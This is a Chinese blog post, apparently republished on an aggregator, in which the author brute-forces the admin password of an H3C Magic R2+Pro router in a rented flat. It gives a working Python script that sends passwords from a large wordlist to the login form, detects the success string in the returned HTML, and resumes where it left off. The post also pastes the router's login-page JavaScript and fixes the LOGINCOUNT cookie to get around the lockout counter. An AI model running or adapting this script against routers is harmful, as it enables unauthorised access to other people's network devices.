[已实现]暴力破解路由器管理密码 您所在的位置:网站首页 openwrt登录密码忘记 [已实现]暴力破解路由器管理密码


2023-07-26 08:29| 来源: 网络整理| 查看: 265

自搬新家以后,第一时间连上网络,登录路由器后台。 博主租的房子是某平台的,网络是由平台提供的。和上次租房不同的地方在于,这次路由器后台管理密码居然和给的wifi连接密码不一样了,肯定是有人改过密码了!admin 等弱口令都试过了,全都不管用!对一个it技术人员来说,被人掌握网络生杀大权肯定是无法容忍的!












network如下,很明显的同步提交 。了解http的都知道同步表当提交表单data放在body里,以 [参数名]=[值]的形数存放到




ctrl+f 一把找到了密码错误的JS ,可以看到 checkPsdFlag是关键checkPsdFlag='flase'。

弹出来的密码错误,在往上面看'true'==checkPsdFlag 是登录成功。

神奇的地方在于checkPsdFlag是resultInfo字符串截取出来的 。

那岂不是这个页面永远都是登录失败?  没错!

记得上面所说的么,这个是同步请求 。因此我怀疑 resultInfo是后台代码渲染出来的,

失败的时候是var resultInfo="false;0"; 成功的时候是var resultInfo="true;0";


所以登录成功的条件就是 返回的html里面存在 var resultInfo="true;0";



于是写了一段python代码[比较随意写的,只为了破解,就没特意封装  ( ᖛ ̫ ᖛ )ʃ)]

字典比较大,所以遍历文件的时候有个跳过多少行参数[这样今天破解不完 下次直接跳过上次已经读过的行继续往下破解就好了]

# -*- coding: utf-8 -*- import requests from itertools import islice import sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Cookie':'LOGINCOUNT=1; LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true' } def post(passwd): data="psd="+passwd res = requests.post(url="" ,data=data,headers=headers) if('var resultInfo="true;0";' in res.text): return True else: return False def record(content): with open("E:/work/36.4GB-18_in_1.lst/passwd.txt", 'w') as file: file.write(content) def readDic(skip): linenum = skip - 1 with open("E:/work/36.4GB-18_in_1.lst/18_in_1.lst", 'r') as file: for line in islice(file,skip,None): linenum = linenum+1 line=line.replace('\n',"") res=post(line) print(str(linenum)+" "+line+" "+str(res), end="|") if(res): print("FOUND!") record("FOUND! "+str(linenum)+" "+line+" "+str(res)) break if(linenum%1000 == 0): record(str(linenum)+" "+line+" "+str(res)) if __name__ == "__main__": readDic(0)



记录着 行号 密码 结果


H3C;Magic R2+Pro千兆版设备登录 var sys_version = "R2+ProGV100R006L01"; var Product_Type = "R2+ProG"; var mac_addr = "78:2C:29:DF:91:86"; var lan_local_info=';;0;78:2C:29:DF:91:86'; var PRODUCT_FORUM_URL = "http://bbs.h3c.com"; var PRODUCT_APPLICATION_URL = "http://magic.h3c.com/rest/magic/getApp"; var bPwdIsSyncByAc = 0; var DefaultLoginflag = 0; var admin_same_flag = 0; var IsSupportPcWebOnly = 0; var tt = lan_local_info.split(";"); var ip_addr = tt[0]; var telnumber = "400 600 6363"; var user_level = 1; /*获取系统类型(PC or Mobile)*/ var isMobileSyetem = checkMobile(); var isAppleSystem = checkAndroidOrApp(); function wifi_init() { /*Begin: Added by y09312 of 2015-03-03*/ /*如果路由器登录页面只是一个子页面,则将其主页面切换为当前登录页面。*/ var parentPage = top.window.location.toString().replace(/.*\//,''); parentPage=parentPage.replace(/\?.*/,''); if(parentPage != cPage) { top.window.location = cPage; } /*End: Added by y09312 of 2015-03-03*/ document.getElementById("psd").value = ""; document.router_password_set.psd.focus(); } function onBodyLoad() { /*刷新登录页面或者提交失败时,清除cookie。*/ deleteCookie("USERLOGINIDFLAG"); deleteCookie("MAIN_FLAG"); deleteCookie("MOBILE_FLAG"); wifi_init(); var flag = getCookie("PSWMOBILEFLAG"); if("true" == flag) { var resultInfo="false;0"; var resultArray = resultInfo.split(";"); var checkPsdFlag = resultArray[0]; var sessionid = resultArray[1]; if ("true" == checkPsdFlag) { /*只有密码验证成功之后,才更新cookie。*/ addCookie("USERLOGINIDFLAG", sessionid); deleteCookie("LOGINCOUNT"); if (1 == IsSupportPcWebOnly) { GURL("home.asp"); } else { GURL("mobile.asp"); } return; } else if("false" == checkPsdFlag) { /*Begin Modified by y09312 2016-06-16, IDMS: 201606300144, of 解决Web登录用户超过限制时Webs进程挂死问题*/ if(1 == sessionid) { mobile_display_message("warningmsg", "访问用户个数超过最大限制。"); } else { var wrong_logincount = getCookie("LOGINCOUNT"); if ("3" == wrong_logincount) { deleteCookie("LOGINCOUNT"); GURL("wrong_login.asp"); } else { mobile_display_message("warningmsg", "密码错误,请重试。"); /*首次打开浏览器时,cookie值为空; 在IE中,空为undefined;在firefox中,空可直接判断;其余主流浏览器都在这两种情况内。*/ if (("" == wrong_logincount) || ("undefined" == typeof(wrong_logincount))) { addCookie("LOGINCOUNT", "1"); } else if ("1" == wrong_logincount) { addCookie("LOGINCOUNT", "2"); } else if ("2" == wrong_logincount) { addCookie("LOGINCOUNT", "3"); } } } /*End Modified by y09312 2016-06-16, IDMS: 201606300144, of 解决Web登录用户超过限制时Webs进程挂死问题*/ document.getElementById("psd").select(); } } /*根据屏幕分辨率,动态调整页面宽度和高度。*/ var screen_width = screen.availWidth; var screen_height = screen.availHeight; document.getElementById("formbackground").style.width = screen_width; document.getElementById("formbackground").style.height = screen_height; deleteCookie("PSWMOBILEFLAG"); deleteCookie("LOGIN_PSD_REM_FLAG"); return; } function mySubmit() { var sUserPass = document.getElementById("psd").value; document.getElementById("warningmsg").innerHTML=""; document.getElementById("warningmsg").height = 1; if (0 == sUserPass.length) { mobile_display_message("warningmsg", "请输入密码。"); document.getElementById("psd").focus(); return false; } if(document.getElementById("psd_en").checked == true) { addCookie("LOGIN_PSD_REM_FLAG", 1); } else { addCookie("LOGIN_PSD_REM_FLAG", 0); } addCookie("PSWMOBILEFLAG", "true"); document.router_password_set.submit(); return true; } function GURL(page) { window.location = page; } function link(item) { document.getElementById(item).href = PRODUCT_APPLICATION_URL; document.getElementById(item).target = "_blank"; } function mouseOn(item) { document.getElementById(item).style.textDecoration= 'underline'; } function mouseOut(item) { document.getElementById(item).style.textDecoration= 'none'; } function accept_it() { deleteCookie("LOGINCOUNT"); GURL("wrong_login.asp"); } if(true == isMobileSyetem) { document.write(''); } else { document.write(''); } 管理密码 记住密码 忘记密码? if(1 == bPwdIsSyncByAc) { document.write(''); document.write(''); document.write('') mobile_display_message_shuoming("pass_message", "当前管理密码与管理器的密码一致。"); document.write(''); document.write(''); document.write(''); } else if(1 == DefaultLoginflag) { document.write(''); document.write(''); document.write('') mobile_display_message_shuoming("pass_message", "当前为默认密码【admin】。"); document.write(''); document.write(''); document.write(''); } else if(1 == admin_same_flag) { document.write(''); document.write(''); document.write('') mobile_display_message_shuoming("pass_message", "当前管理密码与Wi-Fi密码一致。"); document.write(''); document.write(''); document.write(''); } /*以下产品支持APP: B1、B1ST、F1、R2+、R2+pro*/ /*以下产品不支持APP: B0、B3、R100*/ /*在PC端需显示APP和微信的二维码图片,在移动端只需显示APP的链接*/ if (("B3" != Product_Type) && ("B0" != Product_Type) && ("R100" != Product_Type)) { /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */ if(true == isMobileSyetem) { if("" != PRODUCT_APPLICATION_URL) { document.write(''); document.write('点击下载华三魔术家APP'); document.write(''); } } /* End modify by w12167, 2015-1-4, IDMS:201601040185 */ else { /* Begin modify by w12167,2-15-12-10.IDMS:201511250468 */ /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */ //如果是PC,则推送二维码。 document.write(';'); document.write(''); if ("A210-G" != Product_Type) { document.write(''); document.write(';;;;;;;;;'); } document.write(''); document.write(''); /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */ /* End modify by w12167,2-15-12-10.IDMS:201511250468 */ } } else { /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */ if(true == isMobileSyetem) { ; } /* End modify by w12167, 2015-1-4, IDMS:201601040185 */ else { /* Begin modify by w12167, 2015-12-11, IDMS:201511250468 */ /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */ //如果是PC,则推送二维码。 document.write(';'); document.write(''); document.write(''); document.write(''); /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */ /* End modify by w12167, 2015-12-11, IDMS:201511250468 */ } }








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